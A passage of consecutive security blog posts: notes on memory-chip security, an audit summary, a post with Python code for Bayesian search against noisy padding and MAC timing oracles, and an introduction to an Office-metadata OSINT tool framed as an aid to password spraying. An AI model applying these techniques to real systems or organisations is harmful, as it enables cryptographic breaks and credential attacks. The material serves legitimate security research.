  2. Certain SoCs are designed with a separate power input for the fuse banks. This allows an external attacker with only circuit-level access to selectively control the power to the fuse banks, thereby selectively cutting the power at carefully chosen intervals to “zero-out” fuses as they are read by the hardware and firmware.

Phase Change Memory

Phase change memory uses a variety of novel materials to provide the performance characteristics of RAM with the power and non-volatility of flash memory. From a security perspective, some of these memories have properties that might be useful. In particular, the data is often erased with heat, a generally undesirable property, but which could be used as an anti-tamper mechanism to react to certain physical attacks (in particular hot-air rework). Unfortunately, while the technology has been under development for many decades, it remains a topic of intense research, with no parts currently available in commercial volumes.

Final Thoughts

Almost all modern memory devices themselves contain computing elements, microcontrollers, and firmware to tame the complexities of modern interfaces and the complicated physics of the memory technology itself. Link training, wear leveling, caching, sleep and power management, and manufacturing-related test functionality are just some examples of these complexities. This functionality is backed by deeply-embedded firmware within the memory controller. This firmware is frequently written in the C language, where memory safety concerns pose a significant risk. These concerns increase as the firmware complexity increases, driven by modern memory protocols (such as NVMe) becoming increasingly complicated.

For memory vendors, understanding your target markets can be challenging; these are generic components and the final application and threat model is not always clear. Design for the worst case threat model, and defend against as many attacks as commercially viable. Firmware for memory controller components must be free of software defects. A robust and secure SDLC program including static analysis, security testing, and 3rd party audits can help.

We encourage device manufacturers and OEMs to probe their memory vendors. These vendors should have a good explanation as to how they avoid vulnerabilities in the vital firmware that will be deployed deep within the system. They need to have a coherent plan to maintain this firmware with ongoing security patches throughout the lifetime of a product.

When designing the system, think deeply about how an attacker might exploit the system’s memory interfaces, and design in countermeasures wherever possible. Memory encryption, careful key provisioning and management, and the selection of SoC and memory components that support the security guarantees are extremely important to get right at the earliest stages of product development.

Public Report – Zcash Zebra Security Assessment

In Spring 2023, the Zcash Foundation engaged NCC Group to conduct a security assessment of the Zebrad application. Zebrad is a network client that participates in the Zcash consensus mechanism by validating blocks, maintaining the blockchain state (best chain and viable non-finalized chains), and gossiping blocks, transactions, and peer addresses. Five consultants performed the review, in a total of 60 person-days.  The Zebra repository on branch audit-v1.0.0-rc.0 was in scope, with the following modules highlighted as the main areas of focus: zebra-chain, zebra-client, zebra-consensus, zebra-network, zebra-node-services, zebra-rpc, zebra-script, zebra-state, zebra-utils.

Exploiting Noisy Oracles with Bayesian Inference

In cryptographic attacks, we often rely on abstracted information sources which we call “oracles”. Classic examples include the RSA parity oracle attack, which depends on an oracle disclosing the least-significant bit of a ciphertext’s decryption; Bleichenbacher’s attack on PKCS#1v1.5 RSA padding, which depends on an oracle for whether a given ciphertext’s decryption is correctly padded; similarly, the famous padding oracle attack on CBC-mode encryption; or the commonly-seen MAC forgery attacks enabled by non-constant-time MAC validation.

In all of these cases, the attacker finds a way to compound small information leaks into a break of the system under attack. Crucially, in principle, the source of the leak doesn’t matter for the attack: the oracle could come from overly verbose error messages, from timing side channels, or from any other observed property of the system in question. In practice, however, not all oracles are created equal: an oracle that comes from error messages may well be perfectly reliable, whereas one which relies on (say) timing side channels may have to deal with a non-negligible amount of noise.

In this post, we’ll look at how to deal with noisy oracles, and how to mount attacks using them. The specific cases considered will be MAC validation and PKCS7 padding validation, two common cases where non-constant-time code can lead to dramatic attacks. However, the techniques discussed can be adapted to other contexts as well.
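To make the source of such an oracle concrete, here is a minimal sketch of the kind of non-constant-time comparison that leaks timing information, next to a constant-time alternative. The function names `leaky_equal` and `constant_time_equal` are my own illustrative choices and do not come from any particular codebase; `hmac.compare_digest` is the standard-library helper intended for this purpose.

```python
import hmac


def leaky_equal(expected: bytes, provided: bytes) -> bool:
    """Early-exit comparison: running time depends on the length of the matching prefix."""
    if len(expected) != len(provided):
        return False
    for a, b in zip(expected, provided):
        if a != b:
            # Returns sooner the earlier the first mismatch occurs,
            # which is exactly what a timing oracle measures.
            return False
    return True


def constant_time_equal(expected: bytes, provided: bytes) -> bool:
    """Comparison designed so its running time does not reveal where the inputs differ."""
    return hmac.compare_digest(expected, provided)
```

An attacker who can time `leaky_equal` on a guessed MAC learns, noisily, whether the next byte of the guess is right. That noisy yes/no signal is the oracle the rest of this post works with.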

Preliminaries

Our primary tool will be Bayesian inference. In Bayesian inference, we start with a prior probability distribution for the value of some unknown quantity, and we use Bayes’ theorem to update this distribution based on experimental observations.

In our case, the unknown quantity will be a single byte, and the observed data will be the outputs of the noisy oracle. We’ll start with a uniform prior over all 256 possible values, which we will update as we make queries. We will look at a few strategies for making queries, see how they affect the resulting posterior distribution, and compare their performance.

This post is not intended as a math tutorial; readers unfamiliar with the terms used above are gently suggested to review the relevant Wikipedia articles: Bayesian inference and Bayes’ theorem. There is also a very nice video on Bayes’ theorem from 3Blue1Brown, which may be more accessible.

If you’re looking for a primer on the padding oracle attack, I also have a blog post on that topic.

Regarding the noisy oracle itself, we will assume that its noisiness is constant, and that we can measure it. These assumptions both could, in principle, be relaxed somewhat, but they simplify the presentation, and hopefully the reader who wants to generalize the given technique to the more general case will be able to see how to do so.

Let’s be more precise with what we mean by “noisy”: a noisy oracle is one that gives us a correct answer some of the time, but not all the time. Let’s call the false positive probability p_1 and the false negative probability p_2. To be clear, these are conditional probabilities: p_1 is the probability that the oracle answers True when the correct answer is False, and p_2 is the probability that it answers False when the correct answer is True. In some cases we may have p_1 = p_2, but in general there is no need to assume this.
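For experimentation, an oracle with these properties can be simulated. The following is a minimal sketch; the helper name `make_noisy_oracle` and its parameters are hypothetical, chosen only for illustration, and a real attack would replace it with an actual timing or error-message measurement.

```python
import random


def make_noisy_oracle(target, fp_rate, fn_rate, rng=None):
    """Build a simulated oracle for a secret byte `target`.

    fp_rate plays the role of p_1 (answers True although the byte is wrong);
    fn_rate plays the role of p_2 (answers False although the byte is right).
    """
    rng = rng or random.Random()

    def oracle(index):
        if index == target:
            # Correct byte: answer True unless a false negative occurs.
            return rng.random() >= fn_rate
        # Wrong byte: answer False unless a false positive occurs.
        return rng.random() < fp_rate

    return oracle
```

With both rates set to zero this degenerates into a perfect oracle, which is handy for sanity-checking attack code before adding noise.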

Math

First, let’s recall Bayes’ theorem, which we will use to update our prior distribution. Let H be a hypothesis, and E be some evidence on that hypothesis. Then Bayes’ theorem says that

P(H|E) = \frac{P(E|H) P(H)}{P(E)} = \frac{P(E|H) P(H)}{P(E|H)P(H) + P(E|\neg H) P(\neg H)}
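As a quick numeric illustration of the formula, consider a single hypothesis with prior 1/256 and an oracle whose error rates are both 0.4. These rates are illustrative values that I have picked for the example; the helper name `bayes_update` is likewise my own.

```python
def bayes_update(prior, p_e_given_h, p_e_given_not_h):
    """Return P(H|E) from P(H), P(E|H) and P(E|not H)."""
    numerator = p_e_given_h * prior
    return numerator / (numerator + p_e_given_not_h * (1 - prior))


prior = 1 / 256
fp_rate = fn_rate = 0.4  # illustrative error rates (p_1 and p_2)

# Evidence: the oracle answered True for the byte under test.
posterior_after_true = bayes_update(prior, 1 - fn_rate, fp_rate)
# Evidence: the oracle answered False for the byte under test.
posterior_after_false = bayes_update(prior, fn_rate, 1 - fp_rate)

print(f"prior:                 {prior:.5f}")
print(f"posterior after True:  {posterior_after_true:.5f}")
print(f"posterior after False: {posterior_after_false:.5f}")
```

A single positive answer from such an unreliable oracle moves the estimate only slightly (from about 0.0039 to about 0.0058), which is why many queries are needed before any one hypothesis stands out.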

Both of the attacks mentioned above (padding validation and MAC validation) apply the oracle to a byte search. We scan through 256 candidate bytes, one of which has a property that the rest of the bytes do not have, which our oracle is (at least sometimes) able to detect. In both cases, we start from the assumption that each byte is equally likely to satisfy our test.

To put this into notation, we have 256 hypotheses, H_1 through H_{256}. Initially, we start with a uniform distribution: P(H_1) = \ldots = P(H_{256}) = \frac{1}{256}.

We’ll use i, j for list indices. We have 1 \le i, j \le 256 and i \ne j.

We can get two kinds of evidence: E \in \{T, F\} depending on whether the oracle gives us True or False on some query for some byte. We can subscript this by the index of the tested byte; in practice, this’ll just be i or j depending on whether the byte we’re testing corresponds to the hypothesis we’re considering. So we need to be able to evaluate probabilities for H_i together with T_i, T_j, F_i, F_j.

Now, let’s do some case work as we expand each of the terms in Bayes’ theorem:

  • P(H_i) starts at \frac{1}{256} and gets updated on each oracle query.
  • P(\neg H_i) = 1 - P(H_i).
  • Cases where subscripts match:
    • P(T_i | H_i) = 1 - p_2 (true positive)
    • P(F_i | H_i) = p_2 (false negative)
    • P(T_i | \neg H_i) = p_1 (false positive)
    • P(F_i | \neg H_i) = 1 - p_1 (true negative)
  • Cases where subscripts differ:
    • P(T_i | H_j) = p_1 (false positive)
    • P(F_i | H_j) = 1 - p_1 (true negative)
    • P(T_i | \neg H_j) = \ldots (could be true or false positive)
      • Probability of true positive: P(H_i | \neg H_j) (1 - p_2)
        • P(H_i | \neg H_j) = \frac{P(H_i)}{1 - P(H_j)}
      • Probability of false positive: P(\neg H_i | \neg H_j) p_1
        • P(\neg H_i | \neg H_j) = 1 - P(H_i | \neg H_j)
    • P(F_i | \neg H_j) = \ldots (could be true or false negative)
      • Probability of true negative: P(\neg H_i | \neg H_j) (1 - p_1)
      • Probability of false negative: P(H_i | \neg H_j) p_2
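One way to sanity-check this case work is to compare it against a more compact formulation: multiply every prior by the likelihood of the observed answer under that hypothesis, then renormalize. The sketch below does both. The function names are hypothetical, and the normalizing variant is my own reformulation rather than something taken from the implementation later in this post. As far as I can tell the two agree whenever the confidences sum to 1, since both then share the same denominator.

```python
def update_per_hypothesis(confidences, index, result, fp_rate, fn_rate):
    """Apply the case work above, one hypothesis H_j at a time."""
    updated = []
    for j, p_h in enumerate(confidences):
        if j == index:
            p_e_h = (1 - fn_rate) if result else fn_rate
            p_e_not_h = fp_rate if result else (1 - fp_rate)
        else:
            p_e_h = fp_rate if result else (1 - fp_rate)
            p_hi = confidences[index] / (1 - p_h)  # P(H_i | not H_j)
            if result:
                p_e_not_h = p_hi * (1 - fn_rate) + (1 - p_hi) * fp_rate
            else:
                p_e_not_h = p_hi * fn_rate + (1 - p_hi) * (1 - fp_rate)
        updated.append(p_e_h * p_h / (p_e_h * p_h + p_e_not_h * (1 - p_h)))
    return updated


def update_by_normalizing(confidences, index, result, fp_rate, fn_rate):
    """Weight each prior by the likelihood of the observation, then renormalize."""
    def likelihood(j):
        if j == index:
            return (1 - fn_rate) if result else fn_rate
        return fp_rate if result else (1 - fp_rate)

    weighted = [p * likelihood(j) for j, p in enumerate(confidences)]
    total = sum(weighted)
    return [w / total for w in weighted]
```

The second form also makes it obvious that the updated confidences still sum to 1, a property that is easy to lose track of in the per-hypothesis bookkeeping.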

Clear? Good. Let’s move on.

Strategy

We’ll consider three different strategies for making queries:

  • Exhaustive: We will make a large number of queries for each byte. We will simply loop through all 256 bytes, querying each one, until one of them reaches the target confidence threshold. This is the simplest and most commonly recommended strategy; it is also by far the least efficient. It does not adapt to the results of previous queries, and it requires a very large number of oracle queries.
  • Information-guided: We will estimate the expected information gain from each possible oracle query, then choose the query with the greatest expected information gain. This requires us to compute 512 posterior distributions per step (one for each of the 256 candidate bytes and each of the two possible oracle answers) and measure each distribution’s entropy, which takes significantly more local computation. However, this scheme is still a big improvement over the previous one.
  • Probability-guided: We will always query for the byte whose hypothesis has the highest estimated probability. This has much lower compute overhead than the information-guided strategy; in terms of performance, the comparison is very interesting and we will discuss it in detail below.

Implementation

Let’s codify all of the above into a Python class, ByteSearch. We’ll implement the math, but we won’t start there; first, let’s just encapsulate that complexity within a self.get_updated_confidences method which updates our priors based on the results of a single oracle query. Then we can define the following scaffolding:

from math import log2  # used by get_entropy, defined further below

class ByteSearch:
    def __init__(self, oracle, confidence_threshold=0.9, quiet=True):
        self._counter = 0
        self.oracle = oracle
        self.queries = [[] for _ in range(256)]
        self.confidences = [1/256]*256
        self.confidence_threshold = confidence_threshold
        self.quiet = quiet

    def update_confidences(self, index, result):
        """Given an oracle result for a given byte, update the confidences for each byte."""
        self.confidences = self.get_updated_confidences(self.confidences, index, result)

    def pick_exhaustive(self):
        """Cycle through all 256 bytes in order, ignoring previous results."""
        return self._counter % 256

    def pick_by_confidence(self):
        """Pick a byte to test based on the current confidences."""
        return max(range(256), key=lambda i: self.confidences[i])

    def pick_by_entropy(self):
        """Pick a byte to test based on expected reduction in entropy."""
        # NOTE: VERY SLOW; for demo, try replacing 256 with 16 here and in randrange
        entropies = []
        for i in range(256):
            e_if_t = self.get_entropy(self.get_updated_confidences(self.confidences, i, True))
            e_if_f = self.get_entropy(self.get_updated_confidences(self.confidences, i, False))
            p_t = self.confidences[i]
            p_f = 1 - p_t
            entropies.append(p_t * e_if_t + p_f * e_if_f)
        return min(range(256), key=lambda i: entropies[i])

    def query_byte(self, index):
        """Query the oracle for a given byte."""
        self._counter += 1
        result = self.oracle(index)
        self.queries[index].append(result)
        self.update_confidences(index, result)
        if not self.quiet and self._counter & 0xFF == 0:
            print(end=".", flush=True)  # progress dot every 256 queries
        return result

    def search(self, strategy):
        """Search for the plaintext byte by querying the oracle."""
        threshold = self.confidence_threshold
        while max(self.confidences) < threshold:
            self.query_byte(strategy())
        # num_queries is not defined in this snippet; it is assumed to be a
        # module-level list in the calling script that collects query counts.
        num_queries.append(sum(len(l) for l in self.queries))
        return max(range(256), key=lambda i: self.confidences[i])

The idea is that calling code would invoke search() on an instance of this class, passing in something like the instance’s pick_by_confidence or pick_by_entropy bound method as an argument. The above code depends on a few static methods which encapsulate the mathematical machinery:

    # These methods belong inside the ByteSearch class body. FP_RATE and FN_RATE
    # are module-level constants (p_1 and p_2); log2 comes from the math module.

    @staticmethod
    def bayes(h, e_given_h, e_given_not_h):
        """Update the posterior probability of h given e.
        e: evidence
        h: hypothesis
        e_given_h: probability of e given h
        e_given_not_h: probability of e given not h
        """
        return e_given_h * h / (e_given_h * h + e_given_not_h * (1 - h))

    @staticmethod
    def get_updated_confidences(confidences, index, result):
        new_confidences = confidences[:]  # shallow copy
        for j in range(256):
            p_h = confidences[j]
            if index == j:
                # The tested byte is the one this hypothesis is about.
                p_e_given_h = 1 - FN_RATE if result else FN_RATE
                p_e_given_not_h = FP_RATE if result else 1 - FP_RATE
            else:
                # The tested byte (index) differs from this hypothesis (j).
                p_e_given_h = FP_RATE if result else 1 - FP_RATE
                p_hi_given_not_hj = confidences[index] / (1 - confidences[j])
                p_not_hi_given_not_hj = 1 - p_hi_given_not_hj
                if result:
                    p_e_given_not_h = p_hi_given_not_hj * (1 - FN_RATE) + p_not_hi_given_not_hj * FP_RATE
                else:
                    p_e_given_not_h = p_hi_given_not_hj * FN_RATE + p_not_hi_given_not_hj * (1 - FP_RATE)
            new_confidences[j] = ByteSearch.bayes(p_h, p_e_given_h, p_e_given_not_h)
        return new_confidences

    @staticmethod
    def get_entropy(dist):
        # Shannon entropy in bits; zero-probability entries contribute nothing.
        return -sum(p * log2(p) for p in dist if p)

The bayes method implements Bayes’ theorem. The get_updated_confidences method implements the math we discussed above. The get_entropy method computes the entropy of a distribution. These static methods, together with the previous snippet, provide a full implementation for ByteSearch. You can find a test script which defines this class and uses it to run a padding oracle attack here.

Performance

In order to carry out a full attack, which requires recovering 16 bytes in a row without any errors, we need each individual byte search to return an accurate result with high probability. If our confidence in a single search’s correctness is c, then our confidence in the success of the overall attack is c^{16}. Even if c is large, c^{16} may not be: e.g. 0.9^{16} \approx 0.19, 0.95^{16} \approx 0.44, and 0.99^{16} \approx 0.85. Even c = 0.999 gives an overall failure rate of roughly 1.6%.
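The compounding effect is easy to check numerically. The helper name `overall_confidence` below is just an illustrative choice.

```python
def overall_confidence(c, num_bytes=16):
    """Probability that num_bytes independent byte searches all succeed."""
    return c ** num_bytes


for c in (0.9, 0.95, 0.99, 0.999):
    overall = overall_confidence(c)
    print(f"c = {c}: c^16 = {overall:.3f}, overall failure rate = {1 - overall:.1%}")
```

This treats the 16 byte searches as independent, which matches the c^{16} estimate used here.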

In the following measurements, I used c = 0.999. I set the false-positive and false-negative rates to 0.4; in other words, the oracle gives the correct answer only 60% of the time. There is nothing special about this value, and it could be lower – I’ve successfully tested the code with accuracy rates as low as 50.1% – but I thought 60% is both low enough to be interesting and high enough to be practical.

For a baseline reference, with a perfect oracle, a padding oracle attack on a 16-byte block of ciphertext is expected to require an average of 128 queries per byte, giving a total of 2048 oracle queries to complete the attack in the average case, and 4096 queries in the worst case.

In comparison to these roughly two thousand queries, the exhaustive strategy described above is able to complete the attack, with per-byte confidences of 0.999, in an average of about half a million unreliable oracle queries. This is quite a bit more overhead: our number of oracle queries has increased by a factor of roughly 250. To be fair, we’ve gone from a perfect oracle to a very unreliable one, so perhaps some credit is due for the fact that we can complete the attack at all. But even so, this is a lot of overhead – and it turns out we can do much better.

The entropy-guided strategy performs better in terms of oracle queries; however, while it uses fewer queries, it comes at the cost of much higher CPU overhead. This workload parallelizes trivially, but a naive implementation like the one given above is very slow and is not recommended in practice.

Perhaps surprisingly, the probability-guided strategy performs best of all, completing in an average of just over fifty thousand queries. This is roughly a tenfold improvement over the exhaustive strategy, and is several times better than the entropy-guided strategy, despite following a simpler and more naive heuristic. This strategy is recommended in practice. But why does it work so much better?

Analysis

In this section I’d like to share some illustrations of each strategy in action. These take place in a simplified setting: we have a search space of size 16 (and if this reduction bothers you, try thinking of it as a hex digit being checked by a non-constant-time string comparison), and our false-positive and false-negative rates are both fixed at 0.25, giving a 75% accurate oracle. These changes make the search terminate faster and help it fit better on screen. In each search, the target digit is 0x8 (so, the 9th column).
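For readers who want to reproduce this simplified setting without the videos, here is a compact, self-contained simulation sketch. It is not the test script linked earlier: the function names, the use of a renormalizing update, the simulated oracle, and the default of 200 runs are all assumptions of mine. It covers only the exhaustive and probability-guided strategies.

```python
import random

SPACE = 16       # hex-digit search space, as in the simplified setting
FP_RATE = 0.25   # false-positive rate
FN_RATE = 0.25   # false-negative rate


def update(confidences, index, result):
    """Bayesian update: weight each prior by the answer's likelihood, then renormalize."""
    weighted = []
    for j, p in enumerate(confidences):
        if j == index:
            likelihood = (1 - FN_RATE) if result else FN_RATE
        else:
            likelihood = FP_RATE if result else (1 - FP_RATE)
        weighted.append(p * likelihood)
    total = sum(weighted)
    return [w / total for w in weighted]


def search(target, strategy, threshold=0.999, rng=None):
    """Run one simulated search; return (best guess, number of oracle queries)."""
    rng = rng or random.Random()
    confidences = [1 / SPACE] * SPACE
    queries = 0
    while max(confidences) < threshold:
        if strategy == "exhaustive":
            index = queries % SPACE
        else:  # "probability": always query the current frontrunner
            index = max(range(SPACE), key=lambda i: confidences[i])
        # Simulated noisy oracle for the secret digit `target`.
        if index == target:
            result = rng.random() >= FN_RATE
        else:
            result = rng.random() < FP_RATE
        confidences = update(confidences, index, result)
        queries += 1
    return max(range(SPACE), key=lambda i: confidences[i]), queries


def average_queries(strategy, runs=200, seed=1):
    """Average number of oracle queries over several simulated searches."""
    rng = random.Random(seed)
    return sum(search(0x8, strategy, rng=rng)[1] for _ in range(runs)) / runs


if __name__ == "__main__":
    for name in ("exhaustive", "probability"):
        print(name, average_queries(name))
```

Running it with different seeds gives a rough feel for how the two strategies compare in query count, though the exact figures will vary from run to run.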

On the left, I’ve included two charts: the first one indicates the Bayesian confidence levels for each digit, and the second one indicates (on a log scale) the expected information gained by querying for that digit. Stated differently, this chart shows the expected reduction in entropy in the confidence distribution after the given query.

Let’s start with a look at exhaustive search. Whenever someone tells you “just make more oracle queries”, this (or – even worse – its depth-first analogue) is usually what they’re recommending. The inefficiency should be obvious.

Note how many oracle queries get wasted on confirming things that we basically already know, e.g. ruling out digits that already have very low confidence.

Now that we’ve seen the worst strategy, let’s see the best one:

This video includes a few runs of the search with different RNG seeds. Note how this strategy essentially dives in as soon as it finds a promising option, taking a very “depth-first” approach to exploring the search space. Intuitively this seems well-matched to the problem at hand.

Finally, we’ll look at the middle option, which behaves differently from the others. Here, rather than being guided by confidences, we are guided by expected information gain. To compute it, we first work out the Bayesian adjustments that would occur if an oracle query for a given digit returned true or false. We then average the entropies of those two distributions, weighted by their estimated probabilities (using our current confidence levels), and take the difference between this average and our current entropy. In effect, this chooses the query which is expected to minimize post-query entropy in the confidence distribution.
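The expected-information-gain computation can be sketched in a few lines. Note one deliberate difference, which is my own assumption and not what the listing earlier in this post does: this sketch weights the two outcomes by the oracle’s predictive probability of answering True (taking the noise into account), rather than by the raw confidence level. All function names here are illustrative.

```python
from math import log2


def entropy(dist):
    """Shannon entropy of a distribution, in bits."""
    return -sum(p * log2(p) for p in dist if p > 0)


def update(dist, index, result, fp_rate, fn_rate):
    """Bayesian update: weight each prior by the answer's likelihood, then renormalize."""
    weighted = []
    for j, p in enumerate(dist):
        if j == index:
            likelihood = (1 - fn_rate) if result else fn_rate
        else:
            likelihood = fp_rate if result else (1 - fp_rate)
        weighted.append(p * likelihood)
    total = sum(weighted)
    return [w / total for w in weighted]


def expected_information_gain(dist, index, fp_rate, fn_rate):
    """Expected entropy reduction (in bits) from querying the oracle about `index`."""
    # Predictive probability that the oracle answers True for this digit.
    p_true = dist[index] * (1 - fn_rate) + (1 - dist[index]) * fp_rate
    expected_entropy = (
        p_true * entropy(update(dist, index, True, fp_rate, fn_rate))
        + (1 - p_true) * entropy(update(dist, index, False, fp_rate, fn_rate))
    )
    return entropy(dist) - expected_entropy


def pick_by_information_gain(dist, fp_rate, fn_rate):
    """Choose the digit whose query has the greatest expected information gain."""
    return max(range(len(dist)),
               key=lambda i: expected_information_gain(dist, i, fp_rate, fn_rate))
```

With a uniform distribution every digit offers the same expected gain, so the first query is arbitrary; the interesting behavior only emerges once the confidences start to diverge.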

This exhibits some interesting behavior that we don’t see in the other strategies: it is capable of rapidly homing in on promising options, much like the confidence-guided strategy, but it does not do so immediately, even if it gets an initial positive result from the oracle. Instead, it prefers a more thorough, somewhat breadth-first approach which stands in heavy contrast to the confidence-guided strategy (which may not even end up querying for every digit, if it finds a promising one early enough).

The reason for this difference may not be immediately obvious, but it turns out to be simple: while initial positive results are promising, they also carry a degree of risk, because they can be undone: a subsequent negative response from the oracle for the same digit (which is still considered much more likely than not) would reset the digit’s confidence level close to baseline, actually increasing the distribution’s entropy. In contrast, querying other digits about which less is known carries a similar level of upside but much less downside, so these options end up being favored, at least until we’re able to rule them out as frontrunners.

As I said above, this is just a starting point, and there are other metrics that could be used here (e.g. it might be interesting to try using Kullback-Leibler divergence rather than simple arithmetic difference between confidence distributions). But among these options, the confidence-guided strategy stands out as a clear frontrunner, and performs much better than the other strategies, especially as the error rate gets close to 50%. If it finds a promising digit early on, it homes in on it, and it is willing to accept small incremental progress in order to refine its estimate about the frontrunner, which ultimately is what is necessary to cross the confidence threshold quickly. In spite of this focus on speed, it remains very reliable and can refine its results to arbitrary levels of confidence.

Conclusions

Presentations of oracle-based attacks typically assume a perfect oracle; if the noisy-oracle case is treated at all, usually it is assumed that a perfect oracle will be simulated by increasing the noisy oracle’s sample size to the point where its error rate is negligible in practice. This strategy, while simple, is wildly inefficient. In this post, I have shared some strategies for reducing the number of oracle queries required to complete some common attacks. These strategies do not seem to be too widely known; I have not seen them discussed, and all of the above work was derived independently. I hope that this post will help to popularize these strategies.

In closing, I would note that there are opportunities for follow-up work applying these methods to other common oracle-based attacks, as well as relaxing some of the simplifying assumptions outlined above.

I’d like to thank Giacomo Pope, Kevin Henry, and Gerald Doussot for their feedback on this post and for their careful review. Any remaining errors are mine alone.

New Sources of Microsoft Office Metadata – Tool Release MetadataPlus

TL;DR – 31 usernames extracted vs 13 from the next leading brand!

Introduction

Open Source Intelligence Gathering (OSINT) can be an activity in itself and can also form a solid foundation for Full Spectrum Attack Simulations. Getting an idea of username formats as well as a number of known usernames increases the chances of success with password spraying. In addition, any information that can be gathered such as hostname conventions, internal servers, or Operating System types could all inform decisions made once a foothold has been established. Finally, the more information the better when it comes to social engineering.

When conducting research for a macro-based client/server framework, I discovered a number of new places within different types of office documents that contained useful metadata (such as usernames and hostnames) that were not recovered using industry standard tools such as FOCA. This post introduces a new tool, MetadataPlus, which can be found on the NCC Group GitHub (https://github.com/nccgroup/MetadataPlus) and describes the new metadata sources covered by this tool.

In a test case involving roughly 120 publicly accessible documents, FOCA extracted 13 usernames, while MetadataPlus extracted 31 and, due to the formatting of its output, also led to the discovery of the unusual username format pattern in use.

Tool Overview

It is probably fairly well known that Office files can be extracted like a zip file to gain access to internal files that make up the document. MetadataPlus works by extracting document files and looking for specific tags or patterns within the internal files. MetadataPlus is designed to cover a number of Microsoft Office filetypes. It began with xlsx/xlsm (Excel) and docx/docm (Word) but was expanded to trial against all possible save formats for a number of Office products. The ones found to work and included now by default are:

  • xlsx/xlsm, docx/docm – Word and Excel files
  • xltx/xltm, dotx/dotm, potx/potm – template files for Excel, Word, and PowerPoint
  • ppt/pptx – PowerPoint files

The program includes a -a option that will attempt to process every file in the folder. In theory it should work on any Office file that can be extracted into XML files; however, the formats listed above are the ones found to work during testing.
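To make the "Office files are zip files" point concrete, here is a minimal Python sketch using only the standard library. It is not how MetadataPlus itself is implemented; the function names and the tiny in-memory sample container are hypothetical and exist only so the example runs without a real document.

```python
import io
import zipfile


def list_xml_parts(document_bytes):
    """Return the names of the XML parts stored inside an Office container."""
    with zipfile.ZipFile(io.BytesIO(document_bytes)) as archive:
        return sorted(name for name in archive.namelist()
                      if name.endswith(".xml"))


def make_sample_container():
    """Build a tiny stand-in for an .xlsx file (hypothetical contents)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("xl/workbook.xml", "<workbook/>")
        archive.writestr("docProps/core.xml", "<coreProperties/>")
        archive.writestr("xl/media/image1.png", b"not really a png")
    return buffer.getvalue()


if __name__ == "__main__":
    for part in list_xml_parts(make_sample_container()):
        print(part)
```

For a real document, the bytes would come from reading the file in binary mode, and each listed part could then be opened with `archive.read(name)` and searched for the tags described below.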

Metadata Locations

Last saved location

For the first new location of metadata, we need to look at the workbook.xml file of an Excel document. If this contains a tag with the value absPath then this shows the document’s last saved location, which could potentially include usernames or hostnames. For example, it may reveal the hostname of a device if the document was saved on a network drive such as \\networkedcomputer01\docs\test.xlsx, or a username if it was saved locally somewhere like c:\users\bilbo1\Documents\test.xlsx. In the following screenshot from a demonstration document we can find the username gragra576.
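A small Python sketch of that lookup follows. It assumes the saved location is carried in a `url` attribute on the absPath element, which is what I would expect to see in such a file but should be checked against a real workbook.xml; the sample XML and the function name are hypothetical.

```python
import re

# Matches <absPath ...> with or without a namespace prefix and captures
# the value of its url attribute (the attribute name is an assumption).
ABS_PATH_RE = re.compile(r'<(?:\w+:)?absPath\b[^>]*?\burl="([^"]*)"')


def last_saved_locations(workbook_xml):
    """Return every last-saved path found in the text of workbook.xml."""
    return ABS_PATH_RE.findall(workbook_xml)


if __name__ == "__main__":
    sample = (r'<workbook><x15ac:absPath '
              r'url="c:\users\bilbo1\Documents\test.xlsx" '
              r'xmlns:x15ac="urn:example"/></workbook>')
    print(last_saved_locations(sample))
```

A regular expression is used here instead of an XML parser only to keep the sketch short and independent of namespace handling.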

Comments files

The second new location for metadata is any comments file extracted from the document. The comments file includes the author name which can be their username or name, and it is also possible to view the comment – even if this doesn’t show up when you open the document itself. As an example, I have comments1.xml with the <author> tag showing another username:

External and image links

External link and image link files have been found to contain links to insecure (HTTP) servers that might indicate an internal location on a network. These have also included usernames where the server was set up with a user folder structure, as well as hostnames and network filepaths. Additional information can sometimes be inferred, such as an external link to a OneDrive folder indicating that O365 or OneDrive is in use. Further, there is always the chance that additional domains or subdomains will be discovered that can be added to your list of targets for investigation. I have tried to clear most of the noise from these responses so that what is left should be useful for further investigation. In a number of cases I found external links to user folders using “/” instead of “\”, and for this reason, username pattern matching was extended to look for users using this unusual style. In the following example, a link has been added to a network server that seems to include a Windows style folder structure, and the username rodmig358:

Hidden Sheets

Hidden sheets are designated using the element tag State=hidden. MetadataPlus calls out these hidden sheets by file so that they can be unhidden and investigated manually, as they may contain something useful that was expected to remain private. Unhiding is easily performed in Excel, for example by right-clicking on a visible sheet and choosing Unhide…; however, this would be tedious to check over a vast trove of documents, so this list can point you towards documents where this may be worthwhile.

Creator tag

The <dc:creator> tag contains the name of the creator of the document and can be the name or username. In some instances this has been seen to include both, in the form “Chris Nevin – cnevin”, and MetadataPlus will try to separate this into a name and username if this is seen.
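The separation step could look something like the following Python sketch. This is my own guess at a reasonable heuristic, not MetadataPlus's actual logic: it splits on a dash surrounded by spaces and only accepts the right-hand side as a username if it is a single token.

```python
import re


def split_creator(creator):
    """Split 'Full Name - username' into (name, username).

    Returns None when the value does not follow that shape, in which case
    the caller cannot tell whether it is a name or a username.
    """
    # Accept either an en dash (U+2013) or a plain hyphen as the separator.
    parts = re.split(r"\s+[\u2013-]\s+", creator.strip(), maxsplit=1)
    if len(parts) == 2 and parts[1] and " " not in parts[1]:
        return parts[0], parts[1]
    return None


if __name__ == "__main__":
    print(split_creator("Chris Nevin \u2013 cnevin"))
    print(split_creator("Chris Nevin"))
```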

Basic search

As shown above, MetadataPlus looks for users and hostnames in specific locations; however, it also contains pattern matching to extract usernames from filepaths such as c:\users\bill, c:\documents and settings\bill or /users/bill. This pattern matching is also used to perform some basic grepping on each individual file to search for usernames, names, and hostnames that may appear in places we did not expect. MetadataPlus also searches for the string “password” and will flag documents and strings containing this word. It also has an option to search for a user-supplied string that may be relevant to your specific target, or that could be used to search for something like API keys.
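The three path styles mentioned above can be covered by a single regular expression. The Python sketch below is illustrative only; the exact patterns used by the tool may differ, and the names here are hypothetical.

```python
import re

# Matches \users\NAME, /users/NAME and \documents and settings\NAME,
# accepting either slash style, and captures NAME.
USER_PATH_RE = re.compile(
    r'[\\/](?:users|documents and settings)[\\/]([^\\/\s"<>]+)',
    re.IGNORECASE,
)


def usernames_from_text(text):
    """Return the unique, lower-cased usernames found in filepaths in text."""
    return sorted({match.lower() for match in USER_PATH_RE.findall(text)})


if __name__ == "__main__":
    sample = (r"c:\users\bill\notes.docx "
              r"C:\Documents and Settings\ted\y.doc "
              "http://intranet/users/rodmig358/report.xlsx")
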